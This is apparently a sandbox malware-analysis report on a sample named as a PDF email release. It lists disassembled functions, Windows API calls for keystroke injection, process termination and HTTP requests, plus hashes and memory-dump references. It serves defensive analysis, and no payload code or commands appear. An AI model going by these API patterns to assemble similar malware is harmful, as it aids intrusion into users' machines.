                                                                                                          • MapVirtualKeyW.USER32(00000011,00000000), ref: 007701B9
                                                                                                          • MapVirtualKeyW.USER32(00000012,00000000), ref: 007701C1
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.2101307476.0000000000751000.00000020.00000001.01000000.00000003.sdmp, Offset: 00750000, based on PE: true
                                                                                                          • Associated: 00000000.00000002.2101258607.0000000000750000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2101351603.00000000007DF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2101351603.0000000000804000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2101406054.000000000080E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2101460697.0000000000817000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_750000_PK241200518-EMAIL RELEASE-pdf.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: Virtual
                                                                                                          • String ID:
                                                                                                          • API String ID: 4278518827-0
                                                                                                          • Opcode ID: b1c7803407d19264834d46be53cda52b9cdb9ee9263ff325e70b419147878ac6
                                                                                                          • Instruction ID: 639564cf0432b3fd9fe4738413ae39a99cb4a4aa752333ca53fb88f985ce0813
                                                                                                          • Opcode Fuzzy Hash: b1c7803407d19264834d46be53cda52b9cdb9ee9263ff325e70b419147878ac6
                                                                                                          • Instruction Fuzzy Hash: 8B0148B0902759BDE3008F5A8C85A52FFA8FF19354F00411BE15847941C7B5A864CBE5
                                                                                                          Function 007B53E9 Relevance: 9.0, APIs: 6, Instructions: 43windowtimethreadCOMMON
                                                                                                          Download Yara Rule
                                                                                                          APIs
                                                                                                          • PostMessageW.USER32(?,00000010,00000000,00000000), ref: 007B53F9
                                                                                                          • SendMessageTimeoutW.USER32(?,00000010,00000000,00000000,00000002,000001F4,?), ref: 007B540F
                                                                                                          • GetWindowThreadProcessId.USER32(?,?), ref: 007B541E
                                                                                                          • OpenProcess.KERNEL32(001F0FFF,00000000,?,?,?,?,00000010,00000000,00000000,00000002,000001F4,?,?,00000010,00000000,00000000), ref: 007B542D
                                                                                                          • TerminateProcess.KERNEL32(00000000,00000000,?,?,?,00000010,00000000,00000000,00000002,000001F4,?,?,00000010,00000000,00000000), ref: 007B5437
                                                                                                          • CloseHandle.KERNEL32(00000000,?,?,?,00000010,00000000,00000000,00000002,000001F4,?,?,00000010,00000000,00000000), ref: 007B543E
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.2101307476.0000000000751000.00000020.00000001.01000000.00000003.sdmp, Offset: 00750000, based on PE: true
                                                                                                          • Associated: 00000000.00000002.2101258607.0000000000750000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2101351603.00000000007DF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2101351603.0000000000804000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2101406054.000000000080E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2101460697.0000000000817000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_750000_PK241200518-EMAIL RELEASE-pdf.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: Process$Message$CloseHandleOpenPostSendTerminateThreadTimeoutWindow
                                                                                                          • String ID:
                                                                                                          • API String ID: 839392675-0
                                                                                                          • Opcode ID: a978426bfc4dfe94826e72955f2ea0cc1a506a3fce9b932ce0bc7fedb7a9620e
                                                                                                          • Instruction ID: d93a0561551c6e408b6a1cb346cd055837254ba5dc7c0161e8186f78ee00b63c
                                                                                                          • Opcode Fuzzy Hash: a978426bfc4dfe94826e72955f2ea0cc1a506a3fce9b932ce0bc7fedb7a9620e
                                                                                                          • Instruction Fuzzy Hash: BDF09032242158BBE3205BA2DC0DEEF7F7CEFC6B11F00416AFA06D1050DBA95A0186B9
                                                                                                          Function 007B7230 Relevance: 9.0, APIs: 6, Instructions: 33synchronizationthreadCOMMONLIBRARYCODE
                                                                                                          Download Yara Rule
                                                                                                          APIs
                                                                                                          • InterlockedExchange.KERNEL32(?,?), ref: 007B7243
                                                                                                          • EnterCriticalSection.KERNEL32(?,?,00760EE4,?,?), ref: 007B7254
                                                                                                          • TerminateThread.KERNEL32(00000000,000001F6,?,00760EE4,?,?), ref: 007B7261
                                                                                                          • WaitForSingleObject.KERNEL32(00000000,000003E8,?,00760EE4,?,?), ref: 007B726E
                                                                                                            • Part of subcall function 007B6C35: CloseHandle.KERNEL32(00000000,?,007B727B,?,00760EE4,?,?), ref: 007B6C3F
                                                                                                          • InterlockedExchange.KERNEL32(?,000001F6), ref: 007B7281
                                                                                                          • LeaveCriticalSection.KERNEL32(?,?,00760EE4,?,?), ref: 007B7288
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.2101307476.0000000000751000.00000020.00000001.01000000.00000003.sdmp, Offset: 00750000, based on PE: true
                                                                                                          • Associated: 00000000.00000002.2101258607.0000000000750000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2101351603.00000000007DF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2101351603.0000000000804000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2101406054.000000000080E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2101460697.0000000000817000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_750000_PK241200518-EMAIL RELEASE-pdf.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: CriticalExchangeInterlockedSection$CloseEnterHandleLeaveObjectSingleTerminateThreadWait
                                                                                                          • String ID:
                                                                                                          • API String ID: 3495660284-0
                                                                                                          • Opcode ID: cc1ec99bb17e55491b2e2f7c6774f7a4c71c56d8f7bacd192809e92ae8ba0ad2
                                                                                                          • Instruction ID: 1aef05f060671acdd61d4fed9f97932c018ff6add3596faa0eade1c9cd90413d
                                                                                                          • Opcode Fuzzy Hash: cc1ec99bb17e55491b2e2f7c6774f7a4c71c56d8f7bacd192809e92ae8ba0ad2
                                                                                                          • Instruction Fuzzy Hash: C2F08236542612EBD7112B64ED4CADF7739FF45702B104533F643910A0CB7E6901CB64
                                                                                                          Function 007A8992 Relevance: 9.0, APIs: 6, Instructions: 23memorysynchronizationCOMMON
                                                                                                          Download Yara Rule
                                                                                                          APIs
                                                                                                          • WaitForSingleObject.KERNEL32(?,000000FF), ref: 007A899D
                                                                                                          • UnloadUserProfile.USERENV(?,?), ref: 007A89A9
                                                                                                          • CloseHandle.KERNEL32(?), ref: 007A89B2
                                                                                                          • CloseHandle.KERNEL32(?), ref: 007A89BA
                                                                                                          • GetProcessHeap.KERNEL32(00000000,?), ref: 007A89C3
                                                                                                          • HeapFree.KERNEL32(00000000), ref: 007A89CA
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.2101307476.0000000000751000.00000020.00000001.01000000.00000003.sdmp, Offset: 00750000, based on PE: true
                                                                                                          • Associated: 00000000.00000002.2101258607.0000000000750000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2101351603.00000000007DF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2101351603.0000000000804000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2101406054.000000000080E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2101460697.0000000000817000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_750000_PK241200518-EMAIL RELEASE-pdf.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: CloseHandleHeap$FreeObjectProcessProfileSingleUnloadUserWait
                                                                                                          • String ID:
                                                                                                          • API String ID: 146765662-0
                                                                                                          • Opcode ID: 6bb56fb48f429c37275c1f53a158a297bc8705efa3d1c79acde48ec5a7507598
                                                                                                          • Instruction ID: c9e9d49794aab6145ce7aa3a184005001cf46356b467754013e4e72bc4e0eef9
                                                                                                          • Opcode Fuzzy Hash: 6bb56fb48f429c37275c1f53a158a297bc8705efa3d1c79acde48ec5a7507598
                                                                                                          • Instruction Fuzzy Hash: 9EE0C236105005FBDA012FE5EC0C94ABF79FB89322B50C232F21A81170CB3A9820DB58
                                                                                                          Function 007A7530 Relevance: 9.0, APIs: 4, Strings: 1, Instructions: 231COMMON
                                                                                                          Download Yara Rule
                                                                                                          APIs
                                                                                                          • ProgIDFromCLSID.OLE32(?,00000000,?,00000000,00000800,00000000,?,007E2C7C,?), ref: 007A76EA
                                                                                                          • CoTaskMemFree.OLE32(00000000,00000000,?,00000000,00000800,00000000,?,007E2C7C,?), ref: 007A7702
                                                                                                          • CLSIDFromProgID.OLE32(?,?,00000000,007DFB80,000000FF,?,00000000,00000800,00000000,?,007E2C7C,?), ref: 007A7727
                                                                                                          • _memcmp.LIBCMT ref: 007A7748
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.2101307476.0000000000751000.00000020.00000001.01000000.00000003.sdmp, Offset: 00750000, based on PE: true
                                                                                                          • Associated: 00000000.00000002.2101258607.0000000000750000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2101351603.00000000007DF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2101351603.0000000000804000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2101406054.000000000080E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2101460697.0000000000817000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_750000_PK241200518-EMAIL RELEASE-pdf.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: FromProg$FreeTask_memcmp
                                                                                                          • String ID: ,,~
                                                                                                          • API String ID: 314563124-1083855107
                                                                                                          • Opcode ID: c506db4998806c834058f624b1382f9d2dec60b8b61ef4d4721446590f1f8400
                                                                                                          • Instruction ID: 94b54b4318dc628ed1ac3981bc60d5b4f2ae715e75ce650f5c0eb0ff0cf96d46
                                                                                                          • Opcode Fuzzy Hash: c506db4998806c834058f624b1382f9d2dec60b8b61ef4d4721446590f1f8400
                                                                                                          • Instruction Fuzzy Hash: 9481FD75A00109EFCB04DFA4C988EEEB7B9FF89315F204559F506AB250DB75AE06CB60
                                                                                                          Function 007C85ED Relevance: 9.0, APIs: 3, Strings: 2, Instructions: 225COMMON
                                                                                                          Download Yara Rule
                                                                                                          APIs
                                                                                                          • VariantInit.OLEAUT32(?), ref: 007C8613
                                                                                                          • CharUpperBuffW.USER32(?,?), ref: 007C8722
                                                                                                          • VariantClear.OLEAUT32(?), ref: 007C889A
                                                                                                            • Part of subcall function 007B7562: VariantInit.OLEAUT32(00000000), ref: 007B75A2
                                                                                                            • Part of subcall function 007B7562: VariantCopy.OLEAUT32(00000000,?), ref: 007B75AB
                                                                                                            • Part of subcall function 007B7562: VariantClear.OLEAUT32(00000000), ref: 007B75B7
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.2101307476.0000000000751000.00000020.00000001.01000000.00000003.sdmp, Offset: 00750000, based on PE: true
                                                                                                          • Associated: 00000000.00000002.2101258607.0000000000750000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2101351603.00000000007DF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2101351603.0000000000804000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2101406054.000000000080E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2101460697.0000000000817000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_750000_PK241200518-EMAIL RELEASE-pdf.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: Variant$ClearInit$BuffCharCopyUpper
                                                                                                          • String ID: AUTOIT.ERROR$Incorrect Parameter format
                                                                                                          • API String ID: 4237274167-1221869570
                                                                                                          • Opcode ID: df67596729ef695e47034be3773796c2c5047522f55dd47ebb3c3ab56f74081d
                                                                                                          • Instruction ID: 727fd32a8b1788c0dfc076f4b815ef0077ac1b537ae6b7889ffbdee55916ad3b
                                                                                                          • Opcode Fuzzy Hash: df67596729ef695e47034be3773796c2c5047522f55dd47ebb3c3ab56f74081d
                                                                                                          • Instruction Fuzzy Hash: 88917D71604301DFC750DF24C485E5AB7E4EF89714F14892EF99A9B362DB38E909CB92
                                                                                                          Function 00763137 Relevance: 8.9, APIs: 3, Strings: 2, Instructions: 161COMMON
                                                                                                          Download Yara Rule
                                                                                                          APIs
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.2101307476.0000000000751000.00000020.00000001.01000000.00000003.sdmp, Offset: 00750000, based on PE: true
                                                                                                          • Associated: 00000000.00000002.2101258607.0000000000750000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2101351603.00000000007DF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2101351603.0000000000804000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2101406054.000000000080E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2101460697.0000000000817000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_750000_PK241200518-EMAIL RELEASE-pdf.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: _memmove$_free
                                                                                                          • String ID: 3cv$_v
                                                                                                          • API String ID: 2620147621-436345795
                                                                                                          • Opcode ID: 07fbfab121ef3cbd8ab89d774b486235b9ecc1fe04d620e968c68b05e94d33f8
                                                                                                          • Instruction ID: abc856bf91774542f5dabcdd00c45eef779825940553737781b70b412bdfa0cc
                                                                                                          • Opcode Fuzzy Hash: 07fbfab121ef3cbd8ab89d774b486235b9ecc1fe04d620e968c68b05e94d33f8
                                                                                                          • Instruction Fuzzy Hash: EE515C716043819FDB25CF28C480B6ABBE5FF85354F44892DE99A97351EB39E901CB82
                                                                                                          Function 00766192 Relevance: 8.9, APIs: 3, Strings: 2, Instructions: 141COMMON
                                                                                                          Download Yara Rule
                                                                                                          APIs
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.2101307476.0000000000751000.00000020.00000001.01000000.00000003.sdmp, Offset: 00750000, based on PE: true
                                                                                                          • Associated: 00000000.00000002.2101258607.0000000000750000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2101351603.00000000007DF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2101351603.0000000000804000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2101406054.000000000080E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2101460697.0000000000817000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_750000_PK241200518-EMAIL RELEASE-pdf.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: _memset$_memmove
                                                                                                          • String ID: 3cv$ERCP
                                                                                                          • API String ID: 2532777613-1321837940
                                                                                                          • Opcode ID: d708cb000a235094c26406c2acbc17c238866f488bee5655cf6ba2dcbe4e1169
                                                                                                          • Instruction ID: 95dc10621b547ade16d4e63bedf5176fe4559766ba8f26bdd99db04cc07a400e
                                                                                                          • Opcode Fuzzy Hash: d708cb000a235094c26406c2acbc17c238866f488bee5655cf6ba2dcbe4e1169
                                                                                                          • Instruction Fuzzy Hash: 7951A371A00305DFDB24CFA5C8857AAB7E4FF44314F60896EE94AC7291E778E944CB80
                                                                                                          Function 007B2753 Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 114windowCOMMON
                                                                                                          Download Yara Rule
                                                                                                          APIs
                                                                                                          • _memset.LIBCMT ref: 007B27C0
                                                                                                          • GetMenuItemInfoW.USER32(00000004,00000000,00000000,?), ref: 007B27DC
                                                                                                          • DeleteMenu.USER32(?,00000007,00000000), ref: 007B2822
                                                                                                          • DeleteMenu.USER32(?,00000000,00000000,?,00000000,00000000,00815890,00000000), ref: 007B286B
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.2101307476.0000000000751000.00000020.00000001.01000000.00000003.sdmp, Offset: 00750000, based on PE: true
                                                                                                          • Associated: 00000000.00000002.2101258607.0000000000750000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2101351603.00000000007DF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2101351603.0000000000804000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2101406054.000000000080E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2101460697.0000000000817000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_750000_PK241200518-EMAIL RELEASE-pdf.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: Menu$Delete$InfoItem_memset
                                                                                                          • String ID: 0
                                                                                                          • API String ID: 1173514356-4108050209
                                                                                                          • Opcode ID: 9de7e8b9d82505bed67fa29228ecaedbdcc97e839f7bf9d029c565f342179c4a
                                                                                                          • Instruction ID: 9c0182b6f52ad7bdc0349413ff1c5040ee4dcbfa45653c4b774e3e2b1f866091
                                                                                                          • Opcode Fuzzy Hash: 9de7e8b9d82505bed67fa29228ecaedbdcc97e839f7bf9d029c565f342179c4a
                                                                                                          • Instruction Fuzzy Hash: 7041B2702063019FD724DF24DC48B9ABBE4EF85314F144A2EF96697292D738E906CB62
                                                                                                          Function 007B0AD6 Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 105keyboardwindowCOMMON
                                                                                                          Download Yara Rule
                                                                                                          APIs
                                                                                                          • GetKeyboardState.USER32(?,00000000,?,00000001), ref: 007B0B27
                                                                                                          • SetKeyboardState.USER32(00000080,?,00000001), ref: 007B0B43
                                                                                                          • PostMessageW.USER32(00000000,00000102,00000001,00000001), ref: 007B0BA9
                                                                                                          • SendInput.USER32(00000001,00000000,0000001C,00000000,?,00000001), ref: 007B0BFB
                                                                                                          Strings
                                                                                                          • 036210c621026210062101621086210962105621056210e6210c621086210b62104621056210f6210c621006210f6210b621076210462108621006210662103621, xrefs: 007B0B5D
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.2101307476.0000000000751000.00000020.00000001.01000000.00000003.sdmp, Offset: 00750000, based on PE: true
                                                                                                          • Associated: 00000000.00000002.2101258607.0000000000750000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2101351603.00000000007DF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2101351603.0000000000804000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2101406054.000000000080E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2101460697.0000000000817000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_750000_PK241200518-EMAIL RELEASE-pdf.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: KeyboardState$InputMessagePostSend
                                                                                                          • String ID: 036210c621026210062101621086210962105621056210e6210c621086210b62104621056210f6210c621006210f6210b621076210462108621006210662103621
                                                                                                          • API String ID: 432972143-1561487433
                                                                                                          • Opcode ID: a8f9535e804290cbaac6f3c3d0f597245d99444dc1633f75412c2df5584f6b0b
                                                                                                          • Instruction ID: 8019153331736176fd08e3a7a2f860103b2f5a0b8374b92ad5de7f4b3bddbd35
                                                                                                          • Opcode Fuzzy Hash: a8f9535e804290cbaac6f3c3d0f597245d99444dc1633f75412c2df5584f6b0b
                                                                                                          • Instruction Fuzzy Hash: AB315AB0D40208AEFF308B658C09BFBBBA5EB45314F08835AF491521E1C37C895097E5
                                                                                                          Function 007B0C11 Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 101keyboardwindowCOMMON
                                                                                                          Download Yara Rule
                                                                                                          APIs
                                                                                                          • GetKeyboardState.USER32(?,75A8C0D0,?,00008000), ref: 007B0C66
                                                                                                          • SetKeyboardState.USER32(00000080,?,00008000), ref: 007B0C82
                                                                                                          • PostMessageW.USER32(00000000,00000101,00000000), ref: 007B0CE1
                                                                                                          • SendInput.USER32(00000001,?,0000001C,75A8C0D0,?,00008000), ref: 007B0D33
                                                                                                          Strings
                                                                                                          • 036210c621026210062101621086210962105621056210e6210c621086210b62104621056210f6210c621006210f6210b621076210462108621006210662103621, xrefs: 007B0C9F
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.2101307476.0000000000751000.00000020.00000001.01000000.00000003.sdmp, Offset: 00750000, based on PE: true
                                                                                                          • Associated: 00000000.00000002.2101258607.0000000000750000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2101351603.00000000007DF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2101351603.0000000000804000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2101406054.000000000080E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2101460697.0000000000817000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_750000_PK241200518-EMAIL RELEASE-pdf.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: KeyboardState$InputMessagePostSend
                                                                                                          • String ID: 036210c621026210062101621086210962105621056210e6210c621086210b62104621056210f6210c621006210f6210b621076210462108621006210662103621
                                                                                                          • API String ID: 432972143-1561487433
                                                                                                          • Opcode ID: 0b23d4a61c9f3462b1e2b0b2a1ae2c9ac575ce7e2974371920cf263585499dbb
                                                                                                          • Instruction ID: 1137943b310915d78513b19444ecd0c59df2f57ea7083d635ad1a27de121436b
                                                                                                          • Opcode Fuzzy Hash: 0b23d4a61c9f3462b1e2b0b2a1ae2c9ac575ce7e2974371920cf263585499dbb
                                                                                                          • Instruction Fuzzy Hash: 7A312430A40618AEFF308A658818BFFBFB6AB85320F08871BE485521D1D73D995597E5
                                                                                                          Function 007CD7A5 Relevance: 8.9, APIs: 1, Strings: 4, Instructions: 101COMMON
                                                                                                          Download Yara Rule
                                                                                                          APIs
                                                                                                          • CharLowerBuffW.USER32(?,?,?,?,00000000,?,?), ref: 007CD7C5
                                                                                                            • Part of subcall function 0075784B: _memmove.LIBCMT ref: 00757899
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.2101307476.0000000000751000.00000020.00000001.01000000.00000003.sdmp, Offset: 00750000, based on PE: true
                                                                                                          • Associated: 00000000.00000002.2101258607.0000000000750000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2101351603.00000000007DF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2101351603.0000000000804000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2101406054.000000000080E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2101460697.0000000000817000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_750000_PK241200518-EMAIL RELEASE-pdf.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: BuffCharLower_memmove
                                                                                                          • String ID: cdecl$none$stdcall$winapi
                                                                                                          • API String ID: 3425801089-567219261
                                                                                                          • Opcode ID: 49d03deb2aab6d825fd8a0ccceff3de83195e53913445250977df99bcfe04f52
                                                                                                          • Instruction ID: 42ae782cd4cffd3c1f160f2ee54d710a84db291c7612cca5d20a08bae617e691
                                                                                                          • Opcode Fuzzy Hash: 49d03deb2aab6d825fd8a0ccceff3de83195e53913445250977df99bcfe04f52
                                                                                                          • Instruction Fuzzy Hash: F5316971904219EBCF14EF94CC56AEEB3B5FF04720B10862DE869976D1DB79AD09CB80
                                                                                                          Function 007A8E90 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 94windowCOMMON
                                                                                                          Download Yara Rule
                                                                                                          APIs
                                                                                                            • Part of subcall function 00757DE1: _memmove.LIBCMT ref: 00757E22
                                                                                                            • Part of subcall function 007AAA99: GetClassNameW.USER32(?,?,000000FF), ref: 007AAABC
                                                                                                          • SendMessageW.USER32(?,00000188,00000000,00000000), ref: 007A8F14
                                                                                                          • SendMessageW.USER32(?,0000018A,00000000,00000000), ref: 007A8F27
                                                                                                          • SendMessageW.USER32(?,00000189,?,00000000), ref: 007A8F57
                                                                                                            • Part of subcall function 00757BCC: _memmove.LIBCMT ref: 00757C06
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.2101307476.0000000000751000.00000020.00000001.01000000.00000003.sdmp, Offset: 00750000, based on PE: true
                                                                                                          • Associated: 00000000.00000002.2101258607.0000000000750000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2101351603.00000000007DF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2101351603.0000000000804000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2101406054.000000000080E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2101460697.0000000000817000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_750000_PK241200518-EMAIL RELEASE-pdf.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: MessageSend$_memmove$ClassName
                                                                                                          • String ID: ComboBox$ListBox
                                                                                                          • API String ID: 365058703-1403004172
                                                                                                          • Opcode ID: 2d5e849580bf81b0ebecd54c700206a8f1223a6439e74727099a98125f81cce7
                                                                                                          • Instruction ID: 955fb43cd7bb04c458a4ff4c442c358d0dea3bad797e156af8c467ea7a0b5dfd
                                                                                                          • Opcode Fuzzy Hash: 2d5e849580bf81b0ebecd54c700206a8f1223a6439e74727099a98125f81cce7
                                                                                                          • Instruction Fuzzy Hash: DB21F271A05105FEDB18ABB09C49DFEB779DF46360F048229F825A72E0DB7D5809D610
                                                                                                          Function 007C182D Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 86networkCOMMON
                                                                                                          Download Yara Rule
                                                                                                          APIs
                                                                                                          • InternetOpenUrlW.WININET(?,?,00000000,00000000,?,00000000), ref: 007C184C
                                                                                                          • HttpSendRequestW.WININET(00000000,00000000,00000000,00000000,00000000), ref: 007C1872
                                                                                                          • HttpQueryInfoW.WININET(00000000,00000005,?,?,?), ref: 007C18A2
                                                                                                          • InternetCloseHandle.WININET(00000000), ref: 007C18E9
                                                                                                            • Part of subcall function 007C2483: GetLastError.KERNEL32(?,?,007C1817,00000000,00000000,00000001), ref: 007C2498
                                                                                                            • Part of subcall function 007C2483: SetEvent.KERNEL32(?,?,007C1817,00000000,00000000,00000001), ref: 007C24AD
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.2101307476.0000000000751000.00000020.00000001.01000000.00000003.sdmp, Offset: 00750000, based on PE: true
                                                                                                          • Associated: 00000000.00000002.2101258607.0000000000750000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2101351603.00000000007DF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2101351603.0000000000804000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2101406054.000000000080E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2101460697.0000000000817000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_750000_PK241200518-EMAIL RELEASE-pdf.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: HttpInternet$CloseErrorEventHandleInfoLastOpenQueryRequestSend
                                                                                                          • String ID:
                                                                                                          • API String ID: 3113390036-3916222277
